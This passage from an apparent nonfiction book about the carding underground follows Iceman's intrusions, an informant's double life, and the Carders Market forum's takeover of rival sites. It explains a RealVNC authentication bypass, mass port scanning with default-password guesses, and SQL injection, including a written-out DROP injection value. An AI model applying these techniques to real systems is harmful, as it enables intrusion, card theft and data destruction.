I don’t want +to deal with you because I’m a professional and you’re +obviously a newbie at this. To rebuff upper-echelon +scammers, he challenged their pocketbooks: You don’t +have enough money to invest in what I’m doing. +Like an unattainable girl on prom night, Master Splytnr’s +aloofness only made him more attractive. When a new site +called the International Association for the Advancement of + +Criminal Activity launched as a closed forum, he posted a +simple note—Hey, I need a vouch—and two existing +members spoke up for him solely on the strength of his +reputation. +He was vouched on Theft Services next, then +CardersArmy. In November 2005, he was one of the first +members invited to a brand-new forum called +Darkmarket.ws. +A few months later, another, competing site got big +enough to cross his radar, and Master Splyntr joined +Cardersmarket.com. + +22 + +Enemies +onathan Giannone was learning that loss of privacy +was the cost of doing business with Iceman. +He’d been working with the mystery hacker for over a +year—mostly acquiring servers that Iceman used in his +vulnerability scanning—and he was still constantly under +Iceman’s electronic scrutiny. One day, the hacker sent +Giannone a link purporting to be a CNN article about +computer problems at JetBlue, the airline that had rebuffed +Giannone’s long-ago extortion attempt. Giannone clicked +on the link without thinking, and, just like that, Iceman was +on his computer again. Client-side attacks for the win. +Giannone began routinely checking his computer for +malware but couldn’t keep up with Iceman’s intrusions. Max +got ahold of Giannone’s United Airlines Mileage Plus +password and began tracking his movements around the +world—Giannone was a serious air travel aficionado who’d +sometimes fly just to accumulate miles. When he’d land at +San Francisco International, he’d find a text message from +Iceman waiting for him on his cell. “Why are you in San +Francisco?” +It might have been amusing if it weren’t for Iceman’s +frightening mood swings. He could turn on you in a minute +—one day you’d be his best friend, his “number one guy”; +the next he’d be convinced you were a snitch, a ripper, or +worse. He wrote Giannone long, unprompted e-mail +diatribes, laundry lists of grievances against Chris or +various members of the carding community. +It was jealousy, Giannone figured. While he and Chris +were partying in Vegas and the OC, Iceman was locked in + +his apartment, working like a dog. Indeed, the hacker’s +outbursts often coincided with one of Giannone’s California +sojourns. In June 2005, Iceman picked a fight as Giannone +boarded an early morning flight to Orange County—Iceman +was taking him to task for some oversight in one of their +joint operations. The first message hit Giannone’s +BlackBerry at six a.m.—three in the morning San Francisco +time—and the texts continued nonstop for 2,500 miles +before Iceman finally fell silent as the plane landed. When +Giannone checked his e-mail later, he found dozens of +apologetic letters from the hacker. “Sorry, I apologize. I was +bugging out.” +On an earlier occasion, in September 2004, Giannone +told Iceman he was about to fly out to visit Chris, and Max +remarked cryptically that he could prevent the trip if he +wanted to. Giannone laughed. But an hour and a half into +his flight, the plane suddenly turned around and headed for +Chicago. As the airliner set down at O’Hare, the captain +explained that the Los Angeles air traffic control center had +gone dark, necessitating the change in itinerary. +It turned out a computer error was responsible. There +was a known bug in the Windows-based radio control +system at the Los Angeles Air Route Traffic Control Center +in Palmdale, which required technicians to reboot the +machine every 49.7 days. They’d missed a reboot, and a +backup system had failed at the same time. The outage +resulted in hundreds of flights being grounded and five +incidents of airplanes drifting closer to each other than +safety regulations permit. No foul play was discovered, but +years later, when the full range of Max Vision’s powers +became clear, Giannone would find himself wondering if +Iceman hadn’t cracked the FAA’s computers and crippled +Los Angeles, just to stop him from going clubbing with +Chris. +Giannone finally took radical measures to try to keep +Iceman out of his stuff: He bought an Apple. Iceman could +penetrate just about anything. But Giannone was pretty sure + +penetrate just about anything. But Giannone was pretty sure +he couldn’t hack Macs. +While Max kept up surveillance of his crime partners, +Carders Market began slowly generating buzz, intensified +by the mysterious swagger of its founders. As Iceman and +Easylivin’, Max and Chris were unknown quantities among +their fellow crooks, but experienced carders could +practically smell the confidence and street smarts in their +posts. +In Seattle, word of the new site reached Dave “El +Mariachi” Thomas, the former FBI asset who, like Max, had +tried to blow the whistle on Operation Firewall. Thomas had +been feeling adrift since the feds pulled the plug on his +intelligence-gathering operation, and he was looking for a +new online home. +Wary at first, Thomas registered under a fake handle. But +when Iceman invited a public discussion of Carders +Market’s philosophy and charter, Thomas dove in, opining +in detail on the course the site should follow to nurture +successful ops while avoiding Shadowcrew’s fate. +At first, Chris and Max thought Thomas might be a +valuable contributor. But they soon detected that he had a +beef with one of their handpicked admins, Brett “Gollumfun” +Johnson. +Rumors had been swirling about Johnson since his return +to the scene—you don’t just disappear for two years and +then come back onto the carder forums as though nothing +has happened. In August, a hacker called “Manus Dei”— +the Hand of God—added fuel to the fire when he cracked +Johnson’s e-mail account and posted a blistering profile of +the carder on a Google Group called FEDwatch. The write- +up gave Johnson’s real name, his current address in Ohio, +and a slew of personal details stolen from his in-box. +Among the revelations: Johnson had been corresponding +with a New York Times reporter about the carding scene +and had registered a mysterious domain name, + +Anglerphish.com—perhaps in preparation for starting his +own site. +There was nothing to suggest that Johnson was +snitching, though, and neither Max nor Chris had been +particularly alarmed by the info dump. Thomas, on the other +hand, was now convinced the Shadowcrew founder was an +informant. After all, Johnson had announced his retirement +before Operation Firewall and then reappeared afterward +with no real explanation. +The last thing Chris and Max needed on their emerging +site was a shootout between two old-school carders with a +Shadowcrew-era grudge. Still possessed by an +entrepreneurial pride, Chris wanted the site to be the best +crime forum possible. So he reached out to Thomas by ICQ +to try to head off trouble. +“I’m not going to entertain any drama about Gollumfun, or +others, who is a rat who isn’t a rat,” Chris wrote. “I just want +a clean nice board so we can have a safe place to play.” +Chris promised he’d give Johnson the same message: +Play nice. It was Conflict Resolution 101. He followed the +paternalistic lecture by asking Thomas’s advice on running +a successful forum—showing the elder carder respect for +his years of experience. But to make sure his admonition +was taken seriously, Chris added a warning. “We are not +kids dude,” he wrote. “We are very old school. And we are +very good at what we do.” +Thomas promised to behave, adding that he’d do his +best to help make Carders Market the drama-free forum +everyone wanted. But secretly, a hard pit of suspicion was +forming in his gut. Why would anybody defend Brett +Johnson, who was so obviously a snitch? +He noticed that Easylivin’ was using an old version of +ICQ that leaked an Internet IP address. Thomas tried to +trace the address and wound up in Boston, a known hotbed +of federal informants. Carders Market’s hosting was based +in Ft. Lauderdale, Florida, another perfect place to run an +undercover operation. And the phone number on the + +domain name listing went to a police department in +California, albeit in a different area code. That was +probably a coincidence, but who knows? +When he was done adding up the evidence, he felt sick +to his stomach. Carders Market was a federal sting. It was +obvious now. He vowed to himself that he’d do everything +he could to destroy the new site and bring down the old- +school assholes Easylivin’ and Iceman. + +23 + +Anglerphish +ax was developing suspicions of his own about Brett +Johnson. He began keeping a close eye on the admin on +Carders Market, checking his access logs and scouring his +private messages. For good measure, he hacked into +Johnson’s account on the International Association for the +Advancement of Criminal Activity, IAACA, and reviewed his +activity there. He found no smoking gun. +Could he really have brought an informant into the inner +circle of his new crime site? +The problem was that there was no reliable test to +determine if Johnson, or anyone else, was working for the +government. Max wanted one badly—a jurisprudence +security hole, like the buffer overflow in BIND, that he could +use over and over again on anyone he suspected. If +(is_snitch(Gollumfun)) ban(Gollumfun);. He confided in David +Thomas, not realizing that Thomas had already put Iceman +on his mile-long enemies list. +At one point in checking him out, he sent us some +PayPal fulls that were valid, which I pegged as illegal. It +made me think, okay, this guy isn’t a fed or fed lackey. +This is very important for me to find out, because it +is how I have been making trust decisions. We have it +in mind to have a lawyer give us the definitive answer, +my partner said he was on that and would find out. I am +skeptical that we’ll ever get a straight answer though, +because lawyers seem to enjoy taking your money and +providing you heuristic guesses rather than concrete +facts. Maybe I’ve just had bad lawyers. + +I would really like to know a specific way that I can +find something a cop or CI can’t do. Something that if +they do it, their cases are all thrown out 100%. What a +holy grail. So far I have been living as though “doing a +criminal act” disqualifies them. Like people who +smoke a joint with someone to make sure that person +isn’t a cop. Or a hooker who asks her john, “Are you a +cop? You know you have to tell me if you are.” +Brett Johnson was indeed dirty. But contrary to +suspicions, his return to crime in the post-Firewall era +hadn’t started as a snitching expedition. It had all begun +with a girl. +Johnson’s crime and cocaine habits had driven away his +wife of nine years—she threw out his MSR206 on her way +out the door—and he’d been seeing a psychologist to cope +with the loss. Then he met Elizabeth in a North Carolina +bar. She was a twenty-four-year-old exotic dancer at a local +strip club, and for Johnson it was love at first sight. He +burned through his savings to buy her gifts, a $1,500 purse +here, a $600 pair of shoes there, and she moved in with +him after five months. But when they had sex for the first +time, she wouldn’t let him kiss her. +Johnson’s darkest suspicions were confirmed when he +located Elizabeth on a website on which men post reviews +of strippers and prostitutes. There it was, line after line of +disgusting detail about the services his girlfriend had been +providing in exchange for cocaine and cash. He confronted +her with the evidence, and she tearfully promised to quit the +drugs and the prostitution. +Hoping to wrench her from the patterns of her old life, +Johnson showered Elizabeth with more gifts and expensive +dinners out. It was that, and not any hidden agenda, that +impelled his return from retirement. He needed the money, +plain and simple. +The luck that had seen him through Operation Firewall +failed him on February 8, 2005, when Charleston, North + +Carolina, police busted him for using counterfeit Bank of +America cashier’s checks to pay for Krugerrands and +watches he won on eBay and had shipped COD to his +drops. After a week of stewing in the Charleston County +Detention Center, pining for Elizabeth, the Secret Service +paid him a visit. Once he convinced them he was Gollumfun +—the admin who got away when they dropped the hammer +on Shadowcrew—they agreed to help him with his state +case if he’d work for them. +The Secret Service had Johnson’s bail lowered to +$10,000. When he bonded out, the agents moved him from +Charleston to Columbia, South Carolina, where they rented +him a corporate apartment and paid him a $50 per diem. +Now he was a daily visitor to the Columbia field office, +checking in at four p.m. and working until nine, taking the +Secret Service deep into Carders Market and the other +boards. Everything that crossed his computer was +recorded and displayed simultaneously on a forty-two-inch +plasma screen hanging on the wall of the office. +They called it Operation Anglerphish, and Johnson +thought it would make a great book one day. That’s why +he’d registered the domain name Anglerphish.com and +opened up talks with a New York Times reporter. When +Manus Dei cracked his e-mail and revealed those activities +online, Johnson’s Secret Service handlers were irate. They +promptly banned him from using computers away from the +office and told him to cut off contact with the reporter. +Elizabeth left him—her name and occupation had been +exposed in the breach. +Then Iceman stripped Johnson of his privileged position +in Carders Market, and crooks he’d known since the +Counterfeit Library days started refusing to do business +with him. Johnson was running out of credibility, and the +Secret Service was running out of patience. +In late March 2006, the agents decided to act on one of + +Anglerphish’s only catches, a California identity thief who’d +stolen at least $200,000 by e-filing bogus tax returns +through H&R Block, then collecting the refunds himself. +Johnson, an expert in that particular scam, had been talking +with the crook online, and the Secret Service had traced +the chats to the C&C Internet Café in Hollywood. A Los +Angeles agent visited the coffee shop and sat two tables +away while the man filed his fake returns. +But when local police and Secret Service agents raided +the target’s Hollywood apartment, they found it had been +cleaned out: no computers and not a shred of documentary +evidence. The suspect had done everything but deep-clean +the carpet and paint the walls. +Johnson’s handlers in Columbia already suspected their +asset of leaking his informant status after the drama on +Carders Market. Now they had reason to believe he’d +tipped off the target of an impending raid. They brought in a +polygraph examiner and strapped Johnson to the box. +The needles were steady as Johnson answered the first +two questions: Did he contact the target? Did he have +anyone else contact the target? No and no. The final +question was broader: Did Johnson have any unauthorized +contact with anyone? “No,” he said again, his galvanic skin +response skittering up the chart. +Despite the agents’ admonishments, Johnson had +secretly continued his talks with the New York Times +reporter, he admitted, and he was very serious about +getting a book deal. The feds interrogated him until two in +the morning, then had him sign a form consenting to a +search of his agency-funded apartment. +Tossing the apartment was like an Easter egg hunt. The +agents found a stored value card in a shoe in the bedroom +closet. A memo book containing account numbers, PINs, +and identity information was in a toiletry kit in the bathroom. +A sock stuffed in a pair of men’s pants in the closet +contained sixty-three ATM cards. A Rubbermaid bowl at + +the bottom of the laundry bin was keeping fresh nearly two +thousand dollars in cash. Finally, there were loaded Kinko’s +payment cards; Johnson had been buying computer time at +the local copy shop. +He’d been leading a triple life almost from the start of his +service to the agency, posing as a crook at the Columbia +field office and pulling his own very real capers in his off +hours. +Johnson’s specialty was the same scam the Los +Angeles target had been carrying out. He’d mine victims’ +Social Security numbers from online databases, including +California’s Death Index of recently departed Golden State +residents, then file bogus tax returns on their behalf, +directing the refunds into prepaid debit cards that could be +used for ATM withdrawals. He’d pulled in more than +$130,000 in tax refunds under forty-one names, all under +the nose of the Secret Service. +The agents phoned up Johnson’s bail bondsman and +persuaded him to revoke the $10,000 bond that had set the +fraudster free. Then they put Johnson back in the county jail. +After three days, Johnson’s handler showed up with a +senior agent, who was not happy with the informant. +“Before we begin, Brett, I just want to say that you are either +going to tell us everything that you have done the past six +years, or I’m going to make it my mission in life to fuck over +you and your family,” the supervisor growled. “And I’m not +just talking about these current charges. Once you get out, I +will hound you for the rest of your life.” +Johnson refused to cooperate, and the agents stormed +out. The U.S. Attorney’s Office started working on a federal +indictment. But the swindler had one more trick up his +sleeve. Two weeks later he managed to get his bond +reinstated, bailed from the detention center, and promptly +vanished. +Anglerphish was a debacle. After 1,500 hours of work, +the government was left with a fugitive informant and tens of +thousands of dollars in new fraud. There was only one silver + +thousands of dollars in new fraud. There was only one silver +lining: that first batch of twenty-nine platinum dumps +Johnson had bought in May for $600. +The Secret Service had tracked some of the cards to a +pizza parlor in Vancouver—a dead end. But the corporate +Bank of America account the seller used to accept his +payment belonged to one John Giannone, a twenty-one- +year-old living in Rockville Centre on Long Island. + +24 + +Exposure +ea, these girls are white trash. Don’t be friends +with them,” said Chris. “Their minds are different.” +They were at Naan and Curry, a twenty-four-hour Indian +and Pakistani restaurant in San Francisco’s theater district. +It had been three months since Tea hooked up with Chris, +and she was with him for one of his monthly trips to the Bay +Area, where’d he’d meet his mysterious hacker friend +“Sam” just before dawn. They were only four blocks from +Max’s safe house now, but Tea wouldn’t be introduced to +the hacker on this trip or any other. Nobody met Sam in +person. +She was fascinated by how it all worked: the cashless +nature of the crime, the way Chris organized his crew. He’d +told her everything, once he thought she was ready, but +never asked her to hit the stores with the others. She was +special. He didn’t even like her hanging out with his cashing +crew, for fear that they’d somehow taint her personality. +Tea was also the only employee not being paid. After +she’d protested the $40 Chris left on the nightstand, Chris +concluded that Tea didn’t want any money from him at all, +despite the long hours she was spending on Carders +Market and the Russian crime boards. Chris was taking +care of the rent on the Tea House, buying her clothes, and +paying for her travel—but she found it a strange existence, +living online, traveling on confirmation numbers instead of +plane tickets. She’d become a ghost, her body in Orange +County, her mind more often projecting into Ukraine and +Russia, befriending organized cybercrime chieftains in her +role as Iceman’s emissary from the carding world of the + +West. +Iceman, she’d decided, was pretty cool. He was always +respectful and friendly. When Chris and his partner got into +one of their fights, each man would whine and gossip about +the other to Tea over ICQ, like children. At one point, +Iceman sent her a bunch of dumps and suggested she go +into business for herself, a move that sent Chris into a +petulant rage. +As Chris and Tea chatted over Indian food, a tall man +with a ponytail walked in from the street and headed for the +cash register in back, his eyes flickering over them, just for +a moment, before he picked up a bag of takeout and left. +Chris smiled. “That was Sam.” +Back in Orange County, Chris’s counterfeiting operation +was earning enough for him to send his kids to private +schools, cover Tea’s apartment, and, in July, start +searching for a bigger and better home for himself and his +family. He went house-hunting with Giannone and found a +spacious rental—a two-story house in the coastal town of +Capistrano Beach at the end of a quiet cul-de-sac on a bluff +rising above the sandy beach. It was a family-friendly +neighborhood, basketball hoops hanging above garages +and a boat parked in a neighbor’s driveway. His move-in +date was July 15. +Giannone flew back out for the July 4 weekend—Chris’s +last holiday at his old condo—but wound up back at the Tea +House while Chris spent time with his family. It happened all +the time; Giannone would fly into John Wayne Airport, +expecting a weekend of clubbing with Chris, and instead +would end up holed up with one of the crew or be tasked +with babysitting Chris’s boys at his house. Tea was +tolerable, different from the cheap party girls cashing out +Chris’s cards, but time at the Dana Point apartment +dragged. +He phoned Chris and complained that he was bored. + +“Come to the house,” Chris said. They were at the pool. +“The wife’s here with the kids.” +Giannone invited Tea, who’d never seen Chris’s condo +complex just four miles away. When they arrived, Chris, +Clara, and the two boys were splashing around in the pool, +enjoying the sun. Giannone and Tea said hello and made +themselves at home on some deck chairs. +Chris looked stunned. “I see you brought your friend,” he +said to Giannone testily. +Clara knew Giannone, the babysitter, but had never met +Tea. She looked at the stranger, then at Giannone, then +back at the Mongolian, awareness and anger creeping +over her face. +Giannone realized he’d made a blunder. The two women +looked uncannily alike. Tea was a younger version of +Chris’s wife, and at a glance, Clara knew her husband was +sleeping with this woman. +Chris pulled himself out of the pool and walked around to +where they were sitting, his face neutral. He squatted down +in front of Giannone, his hair dripping water onto the +concrete. “What are you doing?” he said in a low voice. +“Get out of here.” +They left. And for the first time since she joined up with +Chris Aragon and his gang, Tea felt dirty. +Chris wasn’t angry—he got a guilty, alpha-male pleasure +out of seeing Tea and Clara in the same place. But Tea’s +crush was becoming a problem. He had genuine affection +for her and her quirky ways, but she was becoming an +unwanted complication. +There was an ideal solution at his disposal. He bought +her a plane ticket to visit her home country for an extended +vacation, literally banishing his overardent paramour to +Outer Mongolia. +With Chris distracted by his tangled love life, Carders +Market was consuming more of Max’s time, and he still had + +his business as “Digits” to run. He was working in the food +service industry now, and it was paying off big. +It had started in June 2006, when a serious security hole +emerged in the software RealVNC, for “virtual network +console”—a remote-control program used to administer +Windows machines over the Internet. +The bug was in the brief handshake sequence that opens +every new session between a VNC client and the RealVNC +server. A crucial part of the handshake comes when the +server and client negotiate the type of security to apply to +the session. It’s a two-step process: First, the RealVNC +server sends the client a shorthand list of the security +protocols the server is configured to support. The list is just +an array of numbers: [2,5], for example, means the server +supports VNC’s type 2 security, a relatively simple +password authentication scheme, and type 5, a fully +encrypted connection. +In the second step, the client tells the server which of the +offered security protocols it wants to use by sending back +its corresponding number, like ordering Chinese food off a +menu. +The problem was, RealVNC didn’t check the response +from the client to see if it was on the menu in the first place. +The client could send back any security type, even one the +server hadn’t offered, and the server unquestioningly +accepted it. That included type 1, which is almost never +offered, because type 1 is no security at all—it allows you +to log in to RealVNC with no password. +It was a simple matter to modify a VNC client to always +send back type 1, turning it into a skeleton key. An intruder +like Max could point his hacked software at any box running +the buggy RealVNC software and instantly enjoy unfettered +access to the machine. +Max started scanning for vulnerable RealVNC +installations as soon as he learned of this gaping hole. He +watched, stunned, as the results scrolled down his screen, +thousands of them: computers at homes and college + +thousands of them: computers at homes and college +dorms; machines in Western Union offices, banks, and +hotel lobbies. He logged in to some at random; in one, he +found himself looking at the feeds from closed-circuit video +surveillance cameras in an office-building lobby. Another +was a computer at a Midwest police department, where he +could listen in on 911 calls. A third put him in a home +owner’s climate control system; he raised the temperature +ten degrees and moved on. +A tiny fraction of the systems were more interesting and +also familiar from his ongoing intrusion into the Pizza +Schmizza: They were restaurant point-of-sale systems. +They were money. +Unlike the simple dumb terminals sitting on the counters +of liquor stores and neighborhood grocers, restaurant +systems had become sophisticated all-in-one solutions that +handled everything from order taking to seating +arrangements, and they were all based on Microsoft +Windows. To support the machines remotely, service +vendors were installing them with commercial back doors, +including VNC. With his VNC skeleton key, Max could open +many of them at will. +So Max, who’d once scanned the entire U.S. military for +vulnerable servers, now had his computers trolling the +Internet day and night, finding and cracking pizza joints, +Italian ristorantes, French bistros, and American-style grills; +he harvested magstripe data everywhere he found it. +Under Visa-issued security standards, that shouldn’t +have been possible. In 2004 the company outlawed the use +of any point-of-sale system that stores magstripe data after +a transaction is complete. In an effort to comply with the +standards, all the major vendors produced patches that +would stop their systems from retaining the swipes. But +restaurants weren’t racing to install the upgrade, which in +some cases was a paid extra. +Max’s scanning machinery had several moving parts. +The first was aimed at finding VNC installations by + +performing a high-speed “port sweep”—a standard +reconnaissance technique that relies on the Internet’s +openness and standardization. +From the start, the network’s protocols were designed to +let computers juggle a variety of different types of +connections simultaneously—today that can include e-mail, +Web traffic, file transfers, and hundreds of other more +esoteric services. To keep it all separate, a computer +initiates new connections with two pieces of information: +the IP address of the destination machine, and a virtual +“port” on that machine—a number from 0 to 65,535—that +identifies the type of service the connection is seeking. The +IP address is like a phone number, and a port is akin to a +telephone extension you read off to the switchboard +operator so he can send your call to the right desk. +Port numbers are standardized and published online. E- +mail software knows to connect to port 25 to send a +message; Web browsers connect to port 80 to retrieve a +website. If a connection on the specified port is refused, it’s +like an unanswered extension; the service you’re looking for +isn’t available at that IP address. +Max was interested in port 5900—the standard port for a +VNC server. He set his machines sweeping through broad +swaths of Internet address space, sending to each a single +sixty-four-byte synchronization packet that would test +whether port 5900 was open for service. +The addresses that answered his sweep streamed into a +PERL script Max wrote that connected to each machine +and tried to log in through the RealVNC bug. If the exploit +didn’t work, the script would try some common passwords: +“1234,” “vnc,” or an empty string. +If it got in, the program grabbed some preliminary +information about the computer: the name of the machine +and the resolution and color depth of the monitor. Max +snubbed computers with low-quality displays, on the +assumption that they were home PCs and not businesses. +It was a high-speed operation: Max was running on five or + +It was a high-speed operation: Max was running on five or +six servers at once, each capable of zipping through a +Class B network, over sixty-five thousand addresses, in a +couple of seconds. His list of vulnerable VNC installations +grew by about ten thousand every day. +The point-of-sale systems were needles in a massive +haystack. He could spot some just from the name: “Aloha” +meant the machine was likely an Aloha POS made by +Atlanta-based Radiant Systems, his favorite target. +“Maitre’D” was a competing product from Posera Software +in Seattle. The rest of them took some guesswork. Any +machine with a name like “Server,” “Admin,” or “Manager” +needed a second look. +Slipping in over his VNC client, Max could see what was +on the computer’s screen as though standing right in front +of it. Since he worked at night, the display on the dormant +PC was usually dark, so he’d nudge his mouse to clear the +screen saver. If there was anyone in the room, it might have +been a little spooky: Remember that time your computer +monitor flipped on for no reason, and the cursor twitched? It +might have been Max Vision taking a quick look at your +screen. +That manual examination was the slow part. Max +recruited Tea to help out—he gave her a VNC client and +started feeding her lists of vulnerable machines, along with +instructions on what to look for. Soon, Max was wired into +eateries throughout America. A Burger King in Texas. A +sports bar in Montana. A trendy nightclub in Florida. A +California grill. He moved up to Canada and found still +more. +Max had gotten his start vending by stealing the dumps +from a single restaurant. Now he had as many as a hundred +feeding him credit card data in nearly real time. Digits +would be doing a lot more business. +With so much work to be done, Dave “El Mariachi” Thomas +had chosen a bad time to become a real pain in Iceman’s + +ass. In June, Thomas did something nearly unheard of in +the insular computer underground: He took their dispute off +the forums and into public, civilian cyberspace, attacking +Carders Market in the comments section of a widely read +computer security blog, where he accused Iceman of being +“LE”—law enforcement. +“Here is a site hosted in Ft Lauderdale Florida,” Thomas +wrote. “Matter of fact, it’s hosted right out of a guy’s house. +Yet, LE refuses to shutter them. Instead, this site promotes +vending of PINs and numbers and PayPals and eBays and +so forth, all the while LE looks on at all the players. +“LE claims they can’t do anything to a site hosted on U.S. +soil. Yet, truth be told, it’s LE running the site just like they +ran Shadowcrew.” +By highlighting Carders Market’s hosting arrangements, +Thomas was targeting Iceman’s Achilles’ heel. The site had +been purring along unmolested because Affinity didn’t +notice the illicit server among its tens of thousands of +legitimate hosted sites. El was working to change that, +lodging complaints with the company over and over again. +The tactic was lacking in logic: If Carders Market really was +under government control, the complaints would fall on deaf +ears; only if it was a real crime site would Affinity kick it off. +If Iceman drowns, then he’s not a witch. +A week after Thomas’s post, Affinity abruptly cut off +Carders Market. The shutdown angered Max; he’d had a +good thing going at ValueWeb. He searched overseas for +new, legitimate hosting that would stand up to El Mariachi, +approaching companies in China, Russia, India, and +Singapore. It always turned out the same way—they’d +demand some upfront money as the price of admission +and then roll a spool of red tape in front of the door, asking +for a passport and a business license or corporate papers. +“Couldn’t be because you have some STUPID FUCKING +NAME called CARDERS this or CARDERS MARKET that, +now could it?” Thomas wrote, taunting Iceman. “Maybe if +you didn’t scream ‘CARDERS WORK HERE,’ you could + +you didn’t scream ‘CARDERS WORK HERE,’ you could +get a small site going, and possibly grow to be the beast +you so desperately need to be.” +It was personal now: Thomas hated Iceman, whether he +was a fed or not, and the feeling had become mutual. +Max finally set up at Staminus, a California firm +specializing in high-bandwidth hosting resistant to DDoS +attacks. By then, Thomas was tearing into him in the +comments section of a random blog called “Life on the +Road.” The blogger had quoted Thomas’s comments about +Carders Market in a brief entry about the forums, unwittingly +volunteering his blog as the new battlefield in the El +Mariachi-versus-Iceman war. +Iceman picked up the gauntlet and posted a lengthy +public rebuttal to Thomas’s indictment, accusing his foe of +“hypocrisy and slander.” +CM is NOT a “crime board” or an “empire” or any +of this bullshit accusation. We are simply a forum that +chooses to allow discussion of financial crime. We +also lend authority in judging which members are real +and which are the fakes, but those are just our +opinions, we make no money from this service. We +are just a CARRIER for the information, a FORUM +through which this communication can occur without +oppression. CM is not involved in any crime +whatsoever. It is not illegal to operate a forum and +allow discussion. +Craigslist.com has people posting about +prostitution, drug hookups, and other obvious crime, +yet people don’t call craigslist a “hookers and blow +one stop shop” or a crime empire. It is recognized as a +CARRIER which is not responsible for the content of +posts therein. This is the state of Carders Market. +The spirited defense completely ignored the detailed +crime tutorials and review system on Carders Market, not +to mention the secret impetus for the site: to give Max a + +place to sell stolen data. +Knowing his California hosting wouldn’t satisfy the +underground, Max resumed his search for an arrangement +overseas. The next month, he hacked himself a new server, +this time in a country as far from U.S. influence as any on +the Net—a nation unlikely to respond to complaints from +Dave Thomas or even the American government. +“Carders Market is now hosted in IRAN,” he announced +on August 11. “Registration is reopened.” + +25 + +Hostile Takeover +apidity is the essence of war. Take advantage of +the enemy’s unreadiness, make your way by unexpected +routes, and attack unguarded spots.” +Max had been reading Sun Tzu’s The Art of War, using +the 2,600-year-old tome as his hacking manual. He +sketched out his plans on a pair of whiteboards in his safe +house; after some attrition and new entrants, there were +five English-language carding sites that mattered in the +underground, and that was four too many. He’d spent +weeks infiltrating his competitors: ScandinavianCarding, +the Vouched, TalkCash, and his chief rival, DarkMarket, the +UK-run site that emerged a month before Carders Market +and was building a powerful reputation as a ripper-free +zone. +In a way, Max’s plan to muscle in on the other forums was +coming from the white-hat side of his personality. The +status quo was working fine for Max the criminal—he +wasn’t greedy, and he was doing brisk business on +Carders Market. But the post-Shadowcrew carding scene +was broken, and when Max the white hat saw something +broken, he couldn’t resist fixing it—just as he’d done for the +Pentagon a few years earlier. +Ego played a role too. The whole carding world seemed +to think Iceman was just another forum administrator, +bankrupt of any skill except the ability to set up forum +software. Max saw a golden opportunity to show the +carders how wrong they were. +DarkMarket turned out to be an unguarded spot. A +British carder called JiLsi ran the site, and he’d made the + +mistake of choosing the same password—“MSR206”— +everywhere, including Carders Market, where Max knew +everyone’s passwords. Max could just walk in and take +over. The Vouched, on the other hand, was a fortress—you +couldn’t even connect to the website without a privately +issued digital certificate installed in your browser. +Fortunately, JiLsi was also a member of that site, and he +had moderator privileges there. Max found a copy of the +certificate in one of JiLsi’s webmail accounts, protected by +the carder’s usual password. From there, it was just a +matter of logging in as JiLsi and leveraging his access to +get at the database. +On TalkCash and ScandinavianCarding, Max +determined that the forum software’s search function was +vulnerable to an “SQL injection” attack. It wasn’t a +surprising discovery. SQL injection vulnerabilities are the +Web’s most persistent weakness. +SQL injection has to do with the behind-the-scenes +architecture of most sophisticated websites. When you visit +a website with dynamic content—news articles, blog posts, +stock quotes, virtual shopping carts—the site’s software is +pulling the content in raw form from a back-end database, +usually running on a completely different computer than the +host to which you’ve connected. The website is a facade— +the database server is the important part, and it’s locked +down. Ideally, it won’t even be accessible from the Internet. +The website’s software speaks to the database server in +a standard syntax called Structured Query Language, or +SQL (pronounced “sequel”). The SQL command SELECT, +for example, asks the database server for all the +information that fits a specified criteria. INSERT puts new +information in the database. The rarely used DROP +instruction will mass-delete data. +It’s a potentially perilous arrangement, because there are +any number of situations where the software has to send a +visitor’s input as part of an SQL command—in a search +query, for example. If a visitor to a music site enters + +query, for example. If a visitor to a music site enters +“Sinatra” in the search box, the website’s software will ask +the database to look for matches. +SELECT titles FROM music_catalog +WHERE artist = ‘Sinatra’; +An SQL injection vulnerability occurs when the software +doesn’t properly sanitize the user’s input before including it +in a database command. Punctuation is the real killer. If a +user in the above scenario searches on “Sinatra’; DROP +music_catalog;” it’s tremendously important that the +apostrophe and semicolons not make it through. +Otherwise, the database server sees this. +SELECT * FROM music_catalog +WHERE artist = ‘Sinatra’; DROP music_catalog;’; +As far as the database is concerned, that’s two +commands in succession, separated by a semicolon. The +first command finds Frank Sinatra albums, the second one +“drops” the music catalog, destroying it. +SQL injection is a standard weapon in every hacker’s +arsenal—the holes, even today, plague websites of all +stripes, including e-commerce and banking sites. And in +2005, the forum software used by TalkCash and +ScandinavianCarding was a soft target. +To exploit the bug on TalkCash, Max registered for a new +account and posted a seemingly innocuous message on +one of the discussion threads. His SQL attack was hidden +in the body of the message, the font color set to match the +background so nobody would see it. +He ran a search query designed to find the post, and the +buggy forum software passed his command to the +database system, which executed it, INSERTing a new +administrator account just for Max. A similar attack worked +at ScandinavianCarding. +On August 14, Max was ready to show the carding world + +what he was capable of. He slid into the sites through the +holes he’d secretly blasted in their ramparts, using his illicit +admin access to copy their databases. The plan would +have made Sun Tzu proud: Attacking and absorbing rival +forums was an unexpected route indeed. Most carders +wanted to avoid attention, not thrust themselves into +prominence. A hostile takeover was unprecedented. +When he was done with the English-speaking sites, Max +went to Eastern Europe. He’d strived to unite the Eastern +European carders with the West, but Tea’s efforts had +been largely fruitless—the Russians liked her but didn’t +trust an American board. Diplomacy had failed; it was time +for action. He found Cardingworld.cc and Mazafaka.cc no +more secure than the western boards and was soon +downloading their databases of private messages and +forum posts. Megabytes of Cyrillic flowed onto his +computer, a secret history of scams and hacks against the +West stretching back months, now permanently +warehoused on Max’s hard drive in San Francisco’s +Tenderloin. +When he was done, he executed the DROP command +on all the sites’ databases, wiping them out. +ScandinavianCarding, the Vouched, TalkCash, +DarkMarket, Cardingworld—the bustling, twenty-four-hour- +a-day marketplaces supporting a billion-dollar global +underground economy all winked out of existence. Ten +thousand criminals around the world, men with six-figure +deals in the works; wives, children, and mistresses to +support; cops to buy off; mortgages to pay; debts to satisfy; +and orders to fill, were, in an instant, blind. Adrift. Losing +money. +They would all know the name “Iceman.” +Max then went to work on the stolen membership data, +ignoring, for now, the Eastern European carders. After +culling the duplicates and undesirables from the four +English-language sites, there were 4,500 new members for +Carders Market. He rolled them all into his site’s database, + +Carders Market. He rolled them all into his site’s database, +so the carders could use their old nicknames and +passwords to log in to their new home. Carders Market had +six thousand members now. It was larger than Shadowcrew +had ever been. +He announced the forced merger in a mass e-mail to his +new members. As the morning dawned in San Francisco, +he watched them gather, confused and angry, on his +consolidated crime forum. Matrix001, a German +DarkMarket administrator, demanded an explanation for +Iceman’s actions. A previously taciturn spam king named +Master Splyntr spoke up to criticize the organization of the +material Iceman had stolen from the other 